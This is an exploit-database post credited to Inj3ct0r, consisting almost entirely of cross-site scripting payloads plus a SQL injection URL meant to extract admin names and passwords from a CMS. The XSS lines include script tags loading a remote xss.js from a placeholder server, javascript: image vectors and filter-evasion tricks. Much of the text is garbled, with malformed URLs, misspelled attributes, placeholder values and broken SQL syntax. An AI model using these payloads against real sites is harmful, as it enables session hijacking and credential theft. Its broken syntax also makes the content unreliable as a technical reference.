1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'`\ /\ \ /'`\ 0
0 /\, \ ___ /\\/\\ \ \ \ \ ,\/\ \/\ \ _ ___ 1
1 \//\ \ /' _ `\ \/\ \//\< /'\ \ \/\ \ \ \ \/\`'\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \/\ \ \\ \ \\ \ \ \/ 1
1 \ \\ \\ \\\ \ \ \/\ \\\ \\\ \/\ \\ 0
0 \//\//\//\ \\ \// \// \// \// \// 1
1 \ \/ >> Exploit database separated by exploit 0
0 \// type (local, remote, DoS, etc.) 1
1 0
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1
#[+] Discovered By : Inj3ct0r
#[+] Site : Inj3ct0r.com
#[+] support e-mail : submit[at]inj3ct0r.com
alert(String.fromCharCode(X1,X2,X3,x4))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(X1,X2,X3,x4))</SCRIPT>
<script SRC=http//:server.com/xss.js></put_SCRIPT>
<a hreef="http://www.server://www.server.com/server.com/">put_code</a>
<a href="http://www.server.com./">put_code</a>
<marquee>http://server.net">put_code</marquee>
<a href="//srver.net">put_code</A>
<a href="http://0x1x.01x0061.0x6/">put_code</a>
[Thread img src]
"<img src=javascript:alert(&quot;XSS&quot;)>"
"<img src="javascript:alert('Put_script');"> [or] <IMG SRC=javascript:alert('put_Script')>"
"<IMG SRC=javascript:alert(String.fromCharCode(X1,X2,X3,X4))>"
"<img src=`javascript:alert("put_xss")`>"
"<IMG SRC="jav ascript:alert('XSS');">"
<IMG
SRC
=
"
write javascript vertikal position exmpl:
j
s
:
a
l
e
r
t
(
'
put code vertical position
'
)
)
;
>
"<IMG SRC=>"
SQL implemented:Injection vulnerability---->installed on c-panel(joomla—sampling write tabel view/editor)
Exploit :server/patch/index.php?menuID=-value union
select////users/2,3,4,5/password////from/2,3,4,5//,Group_CONCAT(name,CHAR(3,4,5),wachtwoord),2,3 from admin–